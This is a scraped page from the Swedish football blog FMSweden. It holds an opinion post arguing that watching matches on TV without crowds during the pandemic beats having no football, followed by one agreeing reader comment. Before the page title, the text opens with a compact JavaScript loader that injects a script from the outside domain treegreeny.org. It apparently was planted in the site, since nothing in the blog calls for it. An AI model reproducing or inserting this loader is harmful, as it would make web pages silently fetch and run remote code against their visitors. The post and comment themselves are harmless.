;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Unpopular opinion – FMSweden
Meny Stäng

Unpopular opinion

Jag har försökt hitta ett sätt att skriva detta utan att trampa allt för mycket folk på tårna, men det finns nog inte, så Here we go. Jag tycker fortfarande det är kul att titta på fotboll, fast det inte finns nån publik. 

För att inte ni ska sätta första fredagsölen i halsen fullständigt så låt mig utveckla och förklara.

När fotbollen fick klartecken att sätta igång igen, var det många röster som hördes, att det kommer inte bli samma sak utan publik, det kommer inte kännas samma. Svaret är ju givetvis, nej, det gör det verkligen inte, men jag tycker ändå att det varit över förväntan.

Den fantastiska stämningen som finns på de svenska arenorna och även runt om i världen saknas, det är klart som korvspad att den gör det. Det finns väl ingen vettig människa som tycker det är kul att spela fotboll utan publik. Publiken eldar på och lyfter sitt lag och försöker på samma sätt “skrämma” motståndarna till misstag och nederlag.

Som tur är slapp jag spela både stormatcher och derbyn utan publik och jag kan inte föreställa mig hur en sådan stormatch hade känts att spela utan publik. Jag är övertygad om att kvalitén på spelet har blivit sämre, just p.g.a att stämningen inte finns där och pushar på spelarna.

Jag är en av de många supportrarna som inte kan förstå hur stora köpcentrum och handelsvaruhus kan få hålla öppet, medan vi i division 5 inte har fått ta in 50 pers på våra matcher.

Nu får vi det igen, men det är fortfarande stopp på de stora arenorna. Jag ska inte ta den striden, för jag kan reglerna för dåligt och givetvis måste hälsa och säkerhet få gå före.

Så var vill jag då komma med detta?

Jo, jag hävdar att jag fortfarande sitter och lever mig med i matcherna på samma sätt som innan, jag tycker fortfarande det skitkul att titta på Champions League och Superettan på TV.

Jag tycker att alternativet är så mycket värre, för det var fruktansvärt när allt låg nere. För mig som sportidiot är detta som vi kan uppleva nu, bättre än inget.

Jag är dock givetvis inte så korkad att jag säger att det inte spelar någon roll, för det är klart att jag också vill ha tillbaka publiken på arenorna, så tro inget annat.

Fram till publik och supportrar är välkomna tillbaka så får vi göra det bästa med det vi har och det är att fortsätta stötta och titta på sport på TV. Det är där den finns just nu och det är gott nog för mig som älskar idrott. För som jag sa: Alternativet är mycket, mycket sämre

Ha en fin helg.

Tobbe

 

Please wait...

Liknande Inlägg

4 kommentarer

  1. Micke

    Självklart är det bättre än alternativet, inte minst för klubbarnas fortsatta existens. Visst är uteblivna publikintäkter en hård smäll, men tänk om även TV-pengarna och sponsorpengarna skulle försvinna för de allsvenska föreningarna till exempel… För min del var den första tiden utan livesport den värsta, någon gång i slutet av mars. Då följde jag Viaplays specialprogram varje kväll om vad som var nytt osv. Men efter ett tag lärde man sig att hantera avsaknaden någorlunda åtminstone. Sedan när Bundesliga var igång kollade jag mer på den än någonsin tidigare. Allsvenskan var det viktigaste av allt i sammanhanget och det är därför oerhört skönt att vi åtminstone kan följa matcherna på TV. Hoppas på publik i höst.

Lämna ett svar